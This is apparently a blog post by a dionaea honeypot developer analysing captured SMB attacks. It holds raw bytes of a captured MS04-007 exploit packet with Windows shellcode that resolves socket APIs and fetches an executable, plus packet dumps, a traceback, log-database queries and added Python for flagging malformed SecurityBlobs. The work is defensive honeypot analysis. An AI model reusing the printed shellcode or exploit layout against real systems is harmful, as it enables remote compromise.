\x03\xdd\xe32I\x8b4\x8b\x03\xf53\xff\xfc3\xc0\xac8\xe0t\x07\xc1\xcf\r\x03\xf8\xeb\xf2;|$\x14u\xe1\x8bZ$\x03\xddf\x8b\x0cK\x8bZ\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xeb\x023\xc0_^][\x89D$\x04\x8b\x04$\x89D$\x08\x8bD$\x04\x83\xc4\x08\xc3^j0Yd\x8b\x19\x8b[\x0c\x8b[\x1c\x8b\x1b\x8b{\x08\x83\xec\x1c\x8b\xec3\xc0Ph.exe\x89e\x14Wh\xeaI\x8a\xe8\xff\xd6j\x06\xffu\x14\xff\xd0\x89E\x04Wh\xdb\x8a#\xe9\xff\xd6\x89E\x0cWh\x8eN\x0e\xec\xff\xd63\xc9f\xb9llQh32.dhws2_T\xff\xd0\x8b\xd8Sh\xb6\x19\x18\xe7\xff\xd6\x89E\x10Sh\xe7y\xc6y\xff\xd6\x89E\x18Shn\x0b/I\xff\xd6j\x06j\x01j\x02\xff\xd0\x89E\x083\xc0PPP\xb8\x02\xff\'\x04\x80\xf4\xffP\x8b\xc4j\x10P\xffu\x08Sh\xa4\x1ap\xc7\xff\xd6\xff\xd0XSh\xa4\xad.\xe9\xff\xd6j\x10\xffu\x08\xff\xd03\xc0PP\xffu\x08Sh\xe5I\x86I\xff\xd6\xff\xd0\x8bM\x08\x89E\x08Q\xffU\x18\x81\xc4\xfc\xfe\xff\xff\x8b\xdc3\xc9Q\xb1\xffQS\xffu\x08\xffU\x10\x85\xc0~\nPS\xffu\x04\xffU\x0c\xeb\xe5\xffu\x08\xffU\x18Wh[L\x1a\xdd\xff\xd6\xffu\x04\xff\xd03\xc0P\xffu\x14Wh\x98\xfe\x8a\x0e\xff\xd6\xff\xd0Wh\xef\xce\xe0`\xff\xd6\xff\xd0UBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB#\n\x03\x08\x00\xf8\x0f\x01\x00\xf8\x0f\x01#\x82\x089\x03\x82\x04\x11\x00CCCC 
\xf0\xfd\x7fSVWf\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff6h\t\x12\xd6c\xe8\xf7\x00\x00\x00\x89F\x08\xe8\xa2\x00\x00\x00\xffv\x04hk\xd0+\xca\xe8\xe2\x00\x00\x00\x89F\x0c\xe8?\x00\x00\x00\xffv\x04h\xfa\x97\x02L\xe8\xcd\x00\x00\x001\xdbh\x10\x04\x00\x00S\xff\xd0\x89\xc3V\x8bv\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4^1\xc0PPPSPP\xffV\x0c\x8bF\x08f\x81\xc4\x80\x00_^[\xff\xe0`\xe8#\x00\x00\x00\x8bD$\x0c\x8dX|\x83C<\x05\x81C(\x00\x10\x00\x00\x81c(\x00\xf0\xff\xff\x8b\x04$\x83\xc4\x14P1\xc0\xc31\xd2d\xff2d\x89"1\xdb\xb8\x90B\x90B1\xc9\xb1\x02\x89\xdf\xf3\xaft\x03C\xeb\xf3\x89~\x10d\x8f\x02Xa\xc3`\xbf \xf0\xfd\x7f\x8b\x1f\x8bF\x08\x89\x07\x8b\x7f\xf8\x81\xc7x\x01\x00\x00\x89\xf99\x19t\x04\x8b\t\xeb\xf8\x89\xfa9Z\x04t\x05\x8bR\x04\xeb\xf6\x89\x11\x89J\x04\xc6C\xfd\x01a\xc3\xa1\x0c\xf0\xfd\x7f\x8b@\x1c\x8bX\x08\x89\x1e\x8b\x00\x8b@\x08\x89F\x04\xc3`\x8bl$(\x8bE<\x8bT\x05x\x01\xea\x8bJ\x18\x8bZ \x01\xeb\xe38I\x8b4\x8b\x01\xee1\xff1\xc0\xfc\xac8\xe0t\x07\xc1\xcf\r\x01\xc7\xeb\xf4;|$$u\xe1\x8bZ$\x01\xebf\x8b\x0cK\x8bZ\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89D$\x1ca\xc2\x08\x00\xeb\xfeCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC#\x82\x04 
\x03\t\x00\xeb\x06\x90\x90\x90\x90\x90\x90\x03\x82\x04\x11\x00DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD' sizeof(4222) off= 27 goff= 63
        NativeOS            = b'\x00'         sizeof(  1) off=4249 goff=4285
        NativeLanManager    = b'\x00'         sizeof(  1) off=4250 goff=4286
        Extrabytes          = b'\x00\x00'     sizeof( -2) off=4251 goff=4287
###[ Raw sizeof(2) ]### 
           load                = b'\x00\x00'     sizeof(  2) off=  0 goff=4285

The SecurityBlob of 4222 bytes contains the payload, so this was MS04-007 - or kill-bill4), adding one to the number of distinct exploits used by the attacker, for a total of 5.
If you feel challenged to add an incident for the case where decoding the ASN.1 SecurityBlob fails, so that there is a proper message in the logs, let me know.
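The incident the TODO asks for amounts to a strict BER walker that reports instead of raising. The Python below is an added example, not dionaea's code: it walks a SecurityBlob tag by tag, enforces definite lengths that stay inside their parent, and returns a report fit for a log line whether the blob decodes or not. The nesting it looks for is read off the dump above (APPLICATION 0, the SPNEGO OID 1.3.6.1.5.5.2, [0], SEQUENCE, [1], then a constructed BIT STRING 0x23 holding 0x03 segments, an empty one and a further 0x23). The two sample blobs are constructed here with the filler shortened from 1024 to 128 bytes; the rule that any constructed BIT STRING is an incident is my heuristic, resting on the fact that DER, which SPNEGO tokens use, requires BIT STRINGs to be primitive, so a conforming client never emits tag 0x23.

```python
def tlv(tag, body):
    """Encode one definite-length BER TLV (used only to build the constructed sample blobs)."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    length_bytes = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length_bytes)]) + length_bytes + body


SPNEGO_OID = bytes.fromhex("2b0601050502")           # 1.3.6.1.5.5.2, the OID at the start of the captured blob
NTLMSSP_OID = bytes.fromhex("2b06010401823702020a")  # 1.3.6.1.4.1.311.2.2.10, what an ordinary client offers

# Constructed sample with the captured blob's nesting; 1024-byte filler runs shortened to 128 bytes.
SEGMENT_A = tlv(0x03, b"\x00" + b"A" * 128)         # primitive BIT STRING, unused-bits byte 0x00
SEGMENT_B = tlv(0x03, b"\x00" + b"B" * 128)
NESTED = tlv(0x23, SEGMENT_A + tlv(0x03, b"") + tlv(0x23, SEGMENT_B))
SUSPICIOUS_BLOB = tlv(0x60, tlv(0x06, SPNEGO_OID) + tlv(0xA0, tlv(0x30, tlv(0xA1, NESTED))))

# Constructed benign counterpart: mechTypes [0] listing NTLMSSP and a one-byte reqFlags [1].
BENIGN_BLOB = tlv(0x60, tlv(0x06, SPNEGO_OID) + tlv(0xA0, tlv(0x30,
    tlv(0xA0, tlv(0x30, tlv(0x06, NTLMSSP_OID))) + tlv(0xA1, tlv(0x03, b"\x01\x00")))))


def read_tlv(buf, pos, end):
    """Decode the tag and length at pos; return (tag, body_start, body_end) or raise ValueError."""
    if pos + 2 > end:
        raise ValueError(f"truncated TLV header at offset {pos}")
    tag, first = buf[pos], buf[pos + 1]
    if (tag & 0x1F) == 0x1F:
        raise ValueError(f"high-tag-number form at offset {pos} is not expected in SPNEGO")
    pos += 2
    if first < 0x80:
        length = first
    elif first == 0x80:
        raise ValueError(f"indefinite length at offset {pos - 1} (not allowed in DER)")
    else:
        nbytes = first & 0x7F
        if nbytes > 4 or pos + nbytes > end:
            raise ValueError(f"bad length octets at offset {pos - 1}")
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    if pos + length > end:
        raise ValueError(f"length {length} at offset {pos} overruns the enclosing element (ends at {end})")
    return tag, pos, pos + length


def walk(buf, pos=0, end=None, depth=0, max_depth=16):
    """List (depth, tag, body_start, body_end) for every element, descending into constructed ones."""
    end = len(buf) if end is None else end
    nodes = []
    while pos < end:
        tag, start, stop = read_tlv(buf, pos, end)
        nodes.append((depth, tag, start, stop))
        if tag & 0x20:                                   # constructed: the body is itself a TLV sequence
            if depth >= max_depth:
                raise ValueError(f"nesting deeper than {max_depth} at offset {pos}")
            nodes.extend(walk(buf, start, stop, depth + 1, max_depth))
        pos = stop
    return nodes


def oid_to_str(body):
    """Dotted form of an OBJECT IDENTIFIER body (first byte packs two arcs, the rest are base-128)."""
    arcs, value = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))


def inspect_security_blob(blob):
    """Parse a SecurityBlob and report what an incident log entry needs; never raises."""
    report = {"spnego": False, "constructed_bitstrings": 0, "largest_segment": 0, "error": None}
    try:
        nodes = walk(blob)
    except ValueError as exc:
        report["error"] = str(exc)
    else:
        for depth, tag, start, stop in nodes:
            if depth == 1 and tag == 0x06 and oid_to_str(blob[start:stop]) == "1.3.6.1.5.5.2":
                report["spnego"] = True
            elif tag == 0x23:                            # constructed BIT STRING, the shape in the dump above
                report["constructed_bitstrings"] += 1
            elif tag == 0x03:
                report["largest_segment"] = max(report["largest_segment"], stop - start)
    # Both outcomes deserve an incident: a blob that does not decode at all, and one that only
    # decodes by way of constructed BIT STRINGs, which DER forbids and real clients never send.
    report["incident"] = report["error"] is not None or report["constructed_bitstrings"] > 0
    return report
```

Returning a report instead of propagating the exception is the whole point: the honeypot keeps serving the session, and the log carries the offset and reason, which is what a "proper message in the logs" for MS04-007 attempts would be.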

Furthermore, I noticed this:

###[ NBT Session Packet sizeof(4) ]### 
  TYPE                = Session Message sizeof(  1) off=  0 goff=  0
  RESERVED            = 0               sizeof(  1) off=  1 goff=  1
  LENGTH              = 102             sizeof(  2) off=  2 goff=  2
###[ SMB Header sizeof(32) ]### 
     Start               = b'\xffSMB'      sizeof(  4) off=  0 goff=  4
     Command             = SMB_COM_TRANSACTION sizeof(  1) off=  4 goff=  8
     Status              = 0               sizeof(  4) off=  5 goff=  9
     Flags               = CASES_ENSITIVITY+CANONICAL_PATHNAMES sizeof(  1) off=  9 goff= 13
     Flags2              = KNOWS_LONG_NAMES+PAGING_IO sizeof(  2) off= 10 goff= 14
     PIDHigh             = 0               sizeof(  2) off= 12 goff= 16
     Signature           = 0               sizeof(  8) off= 14 goff= 18
     Unused              = 0               sizeof(  2) off= 22 goff= 26
     TID                 = 65535           sizeof(  2) off= 24 goff= 28
     PID                 = 1932            sizeof(  2) off= 26 goff= 30
     UID                 = 0               sizeof(  2) off= 28 goff= 32
     MID                 = 31248           sizeof(  2) off= 30 goff= 34
###[ SMB Trans Request sizeof(42) ]### 
        WordCount           = 16              sizeof(  1) off=  0 goff= 36
        TotalParamCount     = 0               sizeof(  2) off=  1 goff= 37
        TotalDataCount      = 28              sizeof(  2) off=  3 goff= 39
        MaxParamCount       = 1024            sizeof(  2) off=  5 goff= 41
        MaxDataCount        = 65504           sizeof(  2) off=  7 goff= 43
        MaxSetupCount       = 0               sizeof(  1) off=  9 goff= 45
        Reserved1           = 0               sizeof(  1) off= 10 goff= 46
        Flags               = 0x0             sizeof(  2) off= 11 goff= 47
        Timeout             = 0               sizeof(  4) off= 13 goff= 49
        Reserved2           = 0               sizeof(  2) off= 17 goff= 53
        ParamCount          = 0               sizeof(  2) off= 19 goff= 55
        ParamOffset         = 74              sizeof(  2) off= 21 goff= 57
        DataCount           = 28              sizeof(  2) off= 23 goff= 59
        DataOffset          = 74              sizeof(  2) off= 25 goff= 61
        SetupCount          = 2               sizeof(  1) off= 27 goff= 63
        Reserved3           = 0               sizeof(  1) off= 28 goff= 64
        Setup               = [9728,64]       sizeof(  4) off= 29 goff= 65
        ByteCount           = 35              sizeof(  2) off= 33 goff= 69
        TransactionName     = b'\\PIPE\\\x00' sizeof(  7) off= 35 goff= 71
        Pad                 = b''             sizeof(  0) off= 42 goff= 78
        Param               = []              sizeof(  0) off= 42 goff= 78
        Pad1                = b''             sizeof(  0) off= 42 goff= 78
###[ DCERPC Header sizeof(16) ]### 
           Version             = 5               sizeof(  1) off=  0 goff= 78
           VersionMinor        = 0               sizeof(  1) off=  1 goff= 79
           PacketType          = Request         sizeof(  1) off=  2 goff= 80
           PacketFlags         = 0x2             sizeof(  1) off=  3 goff= 81
           DataRepresentation  = 16              sizeof(  4) off=  4 goff= 82
           FragLen             = 28              sizeof(  2) off=  8 goff= 86
           AuthLen             = 0               sizeof(  2) off= 10 goff= 88
           CallID              = 0               sizeof(  4) off= 12 goff= 90
###[ DCERPC Request sizeof(12) ]### 
              AllocHint           = 4               sizeof(  4) off=  0 goff= 94
              ContextID           = 0               sizeof(  2) off=  4 goff= 98
              OpNum               = 44              sizeof(  2) off=  6 goff=100
              StubData            = b'\x00\x00\x00\x00' sizeof(  4) off=  8 goff=102

which resulted in

EOFError at EOFError()
 /opt/dionaea/lib/dionaea/python/dionaea/ndrlib.py:109 in unpack_long
        raise EOFError
 /opt/dionaea/lib/dionaea/python/dionaea/ndrlib.py:119 in unpack_string
        mc = self.unpack_long()
 /opt/dionaea/lib/dionaea/python/dionaea/smb/rpcservices.py:805 in handle_OpenPolicy
        SystemName = x.unpack_string()
 /opt/dionaea/lib/dionaea/python/dionaea/smb/rpcservices.py:83 in processrequest
        data = method(con, p)
 /opt/dionaea/lib/dionaea/python/dionaea/smb/smb.py:610 in process_dcerpc_packet
        resp = service.processrequest(service, self, dcep.OpNum, dcep)
 /opt/dionaea/lib/dionaea/python/dionaea/smb/smb.py:507 in process
        outpacket = self.process_dcerpc_packet(p.getlayer(DCERPC_Header))
 /opt/dionaea/lib/dionaea/python/dionaea/smb/smb.py:121 in handle_io_in
        r = self.process(p)
 binding.pyx:748 in dionaea.core.handle_io_in_cb (binding.c:5936)
        None

due to a bug in parsing the arguments in handle_OpenPolicy; if you feel challenged, let me know.

And there were even some calls to unimplemented DCERPC functions:

SELECT
	COUNT(*),
	dcerpcrequests.dcerpcrequest_uuid,
	dcerpcservice_name,
	dcerpcrequest_opnum 
FROM
	dcerpcrequests 
	JOIN dcerpcservices ON(dcerpcrequests.dcerpcrequest_uuid == dcerpcservices.dcerpcservice_uuid) 
	LEFT OUTER JOIN dcerpcserviceops ON(dcerpcserviceops.dcerpcserviceop_opnum = dcerpcrequest_opnum AND dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice )  
WHERE
	dcerpcserviceop_name IS NULL AND
	connection >=1542
GROUP BY 	
	dcerpcrequests.dcerpcrequest_uuid,dcerpcservice_name,dcerpcrequest_opnum
ORDER BY
	COUNT(*) DESC;
 #  uuid                                  service  opnum
 6  1ff70682-0a51-30e8-076d-740be8cee98b  ATSVC    0

ATSVC opnum 0 is part of the Task Scheduler interface5) and is used to schedule the execution of commands.
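Both queries on this page, the per-vulnerability statistics further up and the unimplemented-opnum query just above, can be tried without a live honeypot. The Python below is an added example, not dionaea's code: it builds an in-memory SQLite database with a reduced reconstruction of the logsql tables (assumption: only the columns the two queries touch, the real schema has more), fills it with constructed rows mirroring the connections in the readlogsqltree output, and runs the author's LEFT OUTER JOIN ... IS NULL query verbatim with the connection cutoff as a parameter. The statistics query is rewritten to join requests to services directly by UUID instead of routing through dcerpcbinds; that rewrite is mine.

```python
import sqlite3

# Reduced reconstruction of the dionaea logsql tables: only the columns the two queries use.
SCHEMA = """
CREATE TABLE dcerpcrequests (dcerpcrequest INTEGER PRIMARY KEY, connection INTEGER,
                             dcerpcrequest_uuid TEXT, dcerpcrequest_opnum INTEGER);
CREATE TABLE dcerpcservices (dcerpcservice INTEGER PRIMARY KEY, dcerpcservice_uuid TEXT,
                             dcerpcservice_name TEXT);
CREATE TABLE dcerpcserviceops (dcerpcserviceop INTEGER PRIMARY KEY, dcerpcservice INTEGER,
                               dcerpcserviceop_opnum INTEGER, dcerpcserviceop_name TEXT,
                               dcerpcserviceop_vuln TEXT);
"""

ATSVC = "1ff70682-0a51-30e8-076d-740be8cee98b"
SRVSVC = "4b324fc8-1670-01d3-1278-5a47bf6ee188"
DSSETUP = "3919286a-b10c-11d0-9ba8-00c04fd92ef5"
LSARPC = "12345778-1234-abcd-ef00-0123456789ab"

SERVICES = [(1, ATSVC, "ATSVC"), (2, SRVSVC, "SRVSVC"), (3, DSSETUP, "DSSETUP"), (4, LSARPC, "lsarpc")]
# Deliberately no row for ATSVC opnum 0: that is the unimplemented call the LEFT OUTER JOIN surfaces.
SERVICEOPS = [(1, 2, 31, "NetPathCanonicalize", "MS08-67"),
              (2, 3, 9, "DsRolerUpgradeDownlevelServer", "MS04-11"),
              (3, 4, 44, "OpenPolicy", None)]
# Constructed requests mirroring connections from the readlogsqltree output (1558 is a Double-Tap).
REQUESTS = [(1, 1532, ATSVC, 0), (2, 1538, ATSVC, 0), (3, 1541, SRVSVC, 31), (4, 1543, SRVSVC, 31),
            (5, 1545, ATSVC, 0), (6, 1558, DSSETUP, 9), (7, 1558, DSSETUP, 9), (8, 1565, LSARPC, 44)]

# Per-vulnerability statistics, joining requests to services by UUID (my rewrite of the first query).
VULN_STATS = """
SELECT COUNT(DISTINCT r.connection) AS hits, o.dcerpcserviceop_vuln, s.dcerpcservice_name,
       o.dcerpcserviceop_name
FROM dcerpcrequests r
JOIN dcerpcservices s ON s.dcerpcservice_uuid = r.dcerpcrequest_uuid
JOIN dcerpcserviceops o ON o.dcerpcservice = s.dcerpcservice
                       AND o.dcerpcserviceop_opnum = r.dcerpcrequest_opnum
WHERE r.connection >= :first
GROUP BY s.dcerpcservice_name, o.dcerpcserviceop_name
ORDER BY o.dcerpcserviceop_vuln DESC, hits DESC;
"""

# The author's query for opnums dionaea has no handler for, with the cutoff as a parameter.
UNIMPLEMENTED = """
SELECT COUNT(*), dcerpcrequests.dcerpcrequest_uuid, dcerpcservice_name, dcerpcrequest_opnum
FROM dcerpcrequests
JOIN dcerpcservices ON(dcerpcrequests.dcerpcrequest_uuid == dcerpcservices.dcerpcservice_uuid)
LEFT OUTER JOIN dcerpcserviceops ON(dcerpcserviceops.dcerpcserviceop_opnum = dcerpcrequest_opnum
                                    AND dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice)
WHERE dcerpcserviceop_name IS NULL AND connection >= :first
GROUP BY dcerpcrequests.dcerpcrequest_uuid, dcerpcservice_name, dcerpcrequest_opnum
ORDER BY COUNT(*) DESC;
"""


def build_sample_db():
    """In-memory stand-in for logsql.sqlite, filled with the constructed rows above."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.executemany("INSERT INTO dcerpcservices VALUES (?, ?, ?)", SERVICES)
    db.executemany("INSERT INTO dcerpcserviceops VALUES (?, ?, ?, ?, ?)", SERVICEOPS)
    db.executemany("INSERT INTO dcerpcrequests VALUES (?, ?, ?, ?)", REQUESTS)
    return db


def vuln_stats(db, first_connection):
    """Rows of (distinct connections, vuln, service, call), most severe and most frequent first."""
    return db.execute(VULN_STATS, {"first": first_connection}).fetchall()


def unimplemented_ops(db, first_connection):
    """Rows of (count, uuid, service, opnum) for requests that matched a service but no known opnum."""
    return db.execute(UNIMPLEMENTED, {"first": first_connection}).fetchall()


if __name__ == "__main__":
    db = build_sample_db()
    for row in vuln_stats(db, 1532):
        print(*row)
    for row in unimplemented_ops(db, 1532):
        print("unimplemented:", *row)
```

The inner join in the statistics query silently drops every request whose opnum has no row in dcerpcserviceops, which is why the ATSVC calls never show up there and why the second query, with its outer join and IS NULL filter, is needed to see them at all.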

TODO

Short summary for people who want to get involved:

  • adding support for ATSVC opnum 0 6)
  • fixing lsarpc/OpenPolicy to play with NULL args
  • logging MS04-007 if deserializing the asn.1 SecurityBlob fails - this is by far the most complex task

Given there is no hard proof of any MS11-020 exploitation public yet, I really doubt there is a problem. I bet every major security vendor is trying to be the first to publish on MS11-020, as the impact of this bug is foreseeable.
So while they all keep silent, there is simply nothing to talk about.

2011/04/19/rumors.txt · Last modified: 2011/04/19 23:16 by common